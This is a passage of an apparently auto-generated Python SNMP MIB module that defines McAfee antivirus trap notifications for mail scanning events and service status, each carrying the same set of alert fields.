"mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SCAN_REPORT_OS = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1204)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_MAIL_VIRUSCLEANED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1500)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_MAIL_VIRUSQUARANTINED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1501)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_MAIL_VIRUS_NOTCLEANED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1502)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_MAIL_VIRUS_DETECTED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1503)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_MAIL_VIRUS_DELETED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1504)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_MAIL_VIRUS_FILTERED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1505)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_MAIL_CONTENTBLOCK = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1506)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_MAIL_LOWDISKLIMIT = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1507)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_MAIL_UPPERDISKLIMIT = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1508)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_MAIL_SERVICE_START = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1509)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_MAIL_SERVICE_SHUTDOWN_OK = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1510)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_MAIL_SERVICE_ABEND = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1511)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), 